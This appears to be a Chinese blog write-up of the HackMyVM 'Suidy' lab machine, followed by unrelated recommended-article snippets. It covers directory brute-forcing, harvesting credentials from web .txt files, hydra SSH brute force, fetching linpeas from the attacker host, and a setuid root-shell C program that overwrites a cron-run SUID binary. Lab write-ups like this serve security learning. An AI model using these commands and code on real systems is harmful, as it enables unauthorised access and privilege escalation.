hackmyvm-suidy靶机

最新推荐文章于 2025-06-01 21:21:01 发布
最新推荐文章于 2025-06-01 21:21:01 发布
阅读量302 收藏
点赞数 2
分类专栏: hackmyvm靶场复现 文章标签: 服务器 linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_52710247/article/details/144311420
版权

主机发现

sudo arp-scan -l

 以临时管理员身份扫描并列出本地活动IP

靶机IP:192.168.90.108 

 开放端口

22/tcp open  ssh                                                             
80/tcp open  http 

 dirb爆破

curl 下来的信息很有限,也只有一个页面,那么我们爆破一下吧

dirb http://192.168.90.108
┌──(kali㉿kali)-[~/Desktop/Suidy]                                                                                                                           
└─$ dirb http://192.168.90.108                                                                                                                              
                                                                                                                                                            
-----------------                                                                                                                                           
DIRB v2.22                                                                                                                                                  
By The Dark Raver                                                                                                                                           
-----------------                                                                                                                                           
                                                                                                                                                            
START_TIME: Thu Dec  5 10:25:48 2024                                                                                                                        
URL_BASE: http://192.168.90.108/                                                                                                                            
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt                                                                                                        
                                                                                                                                                            
-----------------                                                                                                                                           
                                                                                                                                                            
GENERATED WORDS: 4612                                                           

---- Scanning URL: http://192.168.90.108/ ----
+ http://192.168.90.108/index.html (CODE:200|SIZE:22)                                                                                                       
+ http://192.168.90.108/robots.txt (CODE:200|SIZE:362)                                                                                                      
                                                                                                                                                            
-----------------
END_TIME: Thu Dec  5 10:25:52 2024
DOWNLOADED: 4612 - FOUND: 2

发现了一个robots.txt文件,curl下来看看

curl http://192.168.90.108/robots.txt

前半段

 中间是很长的空行,如果在不curl下来(因为curl下来的内容会自动拉到最底)或者仔细一点的情况下很容易被忽略

后半段

是一个目录

┌──(kali㉿kali)-[~/Desktop/Suidy]
└─$ curl http://192.168.90.108/shehatesme/         
She hates me because I FOUND THE REAL SECRET!
I put in this directory a lot of .txt files.
ONE of .txt files contains credentials like "theuser/thepass" to access to her system!
All that you need is an small dict from Seclist!

theuser/thepass很可能是用户和密码,先尝试一下

user

HMV2353IVI

 哈哈,是的,但是作者的提示是这里目录里面有很多.txt,用户和密码可能在里面,让我们爆破

gobuster爆破

这里我尝试了几个字典,但是信息收集的不完全,导致后面提取不到用户名和密码

1:这个是我随便选的字典,能用但是信息不完全

2:后来我看到他说只需要seclists下的字典就行,但是好像还是不太行,不知道是不是我选的字典的问题。

for file in $(grep "Status: 200" 1.txt | cut -d ' ' -f 1 | cut -d '/' -f 2) ; do curl -s "http://192.168.90.108/shehatesme/${file}" ; done | sort -u | t
r '/' ':' > passwd.txt

提取信息并保存在passwd.txt文本中

 hydra爆破了一下并没有爆破出用户名和密码

3:又换了一个,这个字典是看佬的wp选的,现在可以了。

sudo gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt -u http://192.168.90.108/shehatesme/ -x txt -o 1.txt

 重新把结果保存重定向搭配passwd.txt,再次爆破

hydra -V -I -f -C passwd.txt ssh://192.168.90.108

出来了,验证了用户名和密码确实是这个

 提权

从根目录查找特殊权限文件

 find / -perm -u=s -type f 2>/dev/null

发现这个目录下面有个suidy特殊权限的文件

查看这个txt文件看看,查看不了,因为这个文件的属组和用户都是suidy,我们现在是theuser用户,所以访问不了,那么我们先执行一下这个特殊文件

发现变成suidy用户了

可以用linpeas.sh脚本扫描一下

脚本路径:

http://通过网盘分享的文件:linpeas.sh 链接: https://pan.baidu.com/s/1xqJqTqjqqwGQ9xTFT4wVDw?pwd=ttkm 提取码: ttkm --来自百度网盘超级会员v4的分享

http://通过网盘分享的文件:pspy64 链接: https://pan.baidu.com/s/1uvRdfYiItshalO3EdfDNAg?pwd=tn63 提取码: tn63 --来自百度网盘超级会员v4的分享

先在自己的kali攻击机上开启一个web服务,然后在靶机上下载文件

在靶机上tmp目录下载,因为我下载过了,所以就不展示了

wget http://192.168.90.230:8888/linpeas.sh

 执行一下

./linpeas.sh

用pspy64脚本查看一下,他是一个进程监控工具

还是老规矩,上传到靶机

执行一下

发现有一分钟执行的脚本文件,那我们写一个bash脚本覆盖它,进行提权

nano exp.c
#include<stdio.h>
#include<unistd.h>
int main(){
setuid(0);
setgid(0);
system("/bin/bash");
}

然后再编译

gcc exp.c -o suidyyyyy

把这个文件输出到suidyyyyy文件里面,然后再覆盖掉suidy里面的suidyyyyy这个文件

cp suidyyyyy /home/suidy/suidyyyyy

如果有报错,肯能是原来的suidyyyyy正在执行,exit退出一下,退出到theuser用户下执行

然后再次执行 ./suidyyyyy,就成功提权了

hackmyvm——Suidy之suid文件覆盖
m0_63641882的博客
03-21 765
1. Seclist一个非常全面的字典2. hydre工具的使用爆破3. tail和sed命令的使用4. suid覆盖进行提权后言:刚入门网安的一只小白,想把自学的学习的过程记录下来方便自己,帮助他人。可以私信博主欢迎学习交流!!!
服务器数据恢复—EMC存储raid5阵列故障导致上层应用崩了的数据恢复案例
beiya123的博客
05-29 378
4、使用北亚企安自主开发的文件解释程序对导出的lun进行文件系统解释。1、将存储中的所有硬盘编号后取出,以只读方式进行全盘镜像,在镜像过程中观察掉线硬盘是否存在物理故障和坏道。2、在镜像文件上分析所有硬盘的底层数据,获取到原存储中raid5阵列的硬盘盘序,raid条带大小、raid阵列信息等重组raid所需要的相关信息,根据这些信息重组raid。3、重组完成后分析LUN在RAID中的分配信息和LUN分配的数据块MAP。根据上述信息,使用北亚企安自主开发的程序解释LUN的数据MAP并导出LUN的所有数据。
python集成inotify-rsync实现跨服务器文件同步
最新发布
alex1801
06-01 466
摘要:本文介绍了一个基于Python watchdog库与rsync命令的文件同步监控工具。该系统通过watchdog监控源目录的文件变更(创建/修改/删除/移动),将变更收集到待处理队列,并设置1秒延迟合并多次操作。采用rsync实现增量同步,支持--delete保持目录一致性和--exclude排除特定文件。环境准备包括安装rsync/watchdog及配置SSH免密登录。核心代码展示了事件处理、命令构建和同步执行逻辑,提供初始同步选项,实现了高效可靠的自动化文件同步方案。(149字)
压测服务器和线上环境的区别
m0_46322965的博客
05-29 448
在进行服务器压测时,测试环境与线上环境的差异会直接影响测试结果的可靠性。
Linux中的权限概念
f040731_007的博客
05-28 954
Linux系统的介绍及操作系统的基本概念Linux基本指令(保姆级教学)
压测的服务器和用户环境的区别
m0_46322965的博客
05-28 1089
在性能压测中,测试服务器与真实用户环境的差异会直接影响测试结果的准确性。
小白畅通Linux之旅-----Linux进程管理
m0_74617719的博客
05-28 625
进程的所有者#进程id#进程占用的cpu百分比#进程占用的内存百分比#进程使用的虚拟内存大小#进程使用的物理内存大小#进程所在终端#进程状态#启动时间#运行时间#启动进程的命令。查看进程的信息,包括进程是否已经消亡,通过pgrep来获得正在被调度的进程的相关信息。-a 显示现行终端机下的所有进程,包括其他用户的进程。用于查看进程树之间的关系,谁是父进程,谁是子进程,可以清楚的看出来是谁创建了谁。-o 当匹配多个进程时,显示进程号最小的那个。
网站服务器出现异常的原因是什么?
wanhengidc的博客
05-28 623
网站时企业和个人用户进行提供信息和服务的重要平台,随着时间的推移,网站服务器出现异常情况也是常见的问题之一,这可能会导致网站无法正常访问或者是运行缓慢,会严重影响到用户的体验感,本文就来介绍一下网站服务器出现异常的原因都有什么吧!网站服务器出现异常可能时因为硬件设施损坏,硬盘作为网站服务器用于存储数据信息的主要设备,一旦出现损坏,可能会导致网站中的数据信息丢失或者是无法进行读取,而服务器中的CPU出现过载情况,则会严重影响网站的整体性能,导致处理能力下降。
联通专线加持!亿林网络 24 核 32G 裸金属服务器,千兆共享带宽适配中小型企业 IT 架构
2501_91663411的博客
05-29 763
在当今云计算和裸金属服务器市场激烈竞争的背景下,寻找性能与成本完美平衡的解决方案成为许多企业和开发者的迫切需求。今天我们要评测的是黑龙江亿林启盛推出的裸金属服务器配置:24核CPU、32GB内存、千兆共享带宽的联通单线方案。黑龙江亿林启盛的这款24核32G裸金属服务器确实如其宣传所言,在性能和成本之间找到了良好的平衡点。这样的配置对于Web服务、中型数据库、数据处理等场景完全够用,同时避免了高端型号带来的过高成本。对比类似配置的云服务器,性能提升约15-20%,这得益于裸金属架构没有虚拟化开销。
Ubuntu 服务器配置与 Cloudflare Tunnel 部署指南 免费内网穿透家用服务器
专注技术分享
05-28 883
作者获取 token 和本地端口。(可选)写 config.yml 配置转发规则。写 start-tunnel.sh 脚本,内容为 cloudflared tunnel run --token “你的token”。赋权并运行脚本即可。
服务器tty2终端如何关机
yin1331102028yin的博客
05-28 386
服务器tty2终端如何关机
每日一题——提取服务器物料型号并统计出现次数
zxjiaya的博客
05-29 863
在企业IT运维或报废资产管理中,分析各台服务器上的CPU、内存、主板型号,并统计可回收配件的数量,是一个典型的文本处理与统计问题。 本题模拟了这样的场景,给定每台服务器的物料编码字符串,我们要从中提取出每类备件的**首个型号标识**,统计所有服务器上每种型号的数量,并按字典序输出。
【HW系列】—C2远控服务器(webshell链接工具, metasploit、cobaltstrike)的漏洞特征流量特征
2402_84408069的博客
05-29 1206
本文分析了常见渗透工具蚁剑、冰蝎、哥斯拉以及Metasploit、CobaltStrike的流量特征。蚁剑流量包含PHP代码片段和特殊参数名,冰蝎采用动态密钥协商和固定Content-Type标识,哥斯拉则带有异常Cookie特征。Metasploit分阶段下载Payload并通过异常端口交互,CobaltStrike具有checksum8路径规则和DNS异常查询特征。检测建议包括监控异常流量模式、分析进程日志,防御策略推荐框架加固和网络防护。本文仅作技术研究,禁止非法使用。
2025年通用 Linux 服务器操作系统该如何选择?
藏云阁
05-30 970
服务器操作系统的选择对一个企业IT和云服务影响很大,主推的操作系统在后期更换的成本很高,而且也有很大的迁移风险,所以企业在选择服务器操作系统时要尤为重视。根据本人近10年的运维、SRE、和架构师的历史经验,我认为服务器操作系统的选型可以通过以下几个维度进行评估: - 上云支持:是否满足云上云下的一致性,便于云下业务迁移上云。 - 社区支持:是否具有生命力、社区是否活跃。 - 本地化支持:是否对中文有良好的支持。 - 安全稳定:是否能满足业务的安全、稳定运行的核心需求。
如何将 WSL 的 Ubuntu-24.04 迁移到其他电脑
一起coding,一起嗨。
05-29 817
如何将 WSL 的 Ubuntu-24.04 迁移到其他电脑
第一章 Linux的例行性工作(计划任务)
m0_74137984的博客
05-29 1233
atat。
Linux 进程控制
yanxiao07的博客
05-29 979
linux 进程控制
家庭路由器改装,搭建openwrt旁路由以及手机存储服务器,实现外网节点转发、内网穿透、远程存储、接入满血DeepSeek方案
weixin_61908666的博客
05-29 696
大家好,也是好久没有发文了,最近在捣鼓一些比较有趣的东西,打算跟大家分享一下!先聊一下我的大致方案嘛,最近感觉家里路由器平时一直就只有无线广播供网的功能,感觉这么好的一下嵌入式设备产品不应该就干这么辣鸡的活嘛,后来我就去了解下一下这么改装和进阶,结果不看不知道,一下吓一跳。没想到大佬们已经改装成这种程度了,我也试着做了一下,打算汇总一下发出来,追一追时代的尾气。
Linux 简单模拟实现C语言文件流
2401_83603768的博客
06-01 397
🌇前言在C语言的文件流中,存在一个FILE结构体类型,其中包含了文件的诸多读写信息以及重要的文件描述符fd,在此类型之上,诞生了C语言文件相关操作,如fopenfclosefwrite等,这些函数本质上都是对系统调用的封装,因此我们可以根据系统调用和缓冲区相关知识,模拟实现出一个简单的C语言文件流。注意:demo。
美国服务器文件系统的基本功能和命令
YOKEhn的博客
05-30 558
sudo mdadm --create --verbose /dev/md1 --level=1 --raid-devices=2 /dev/sda1 /dev/sdb1 # 创建RAID 1阵列。使用分区工具(如`fdisk`或`parted`)对硬盘分区后,通过格式化命令创建文件系统。通过`chmod`命令设置文件权限(读`R`、写`W`、执行`X`),并通过`chown`设置文件所有者。sudo cp /mnt/data/example.txt /mnt/data/docs/ # 复制文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值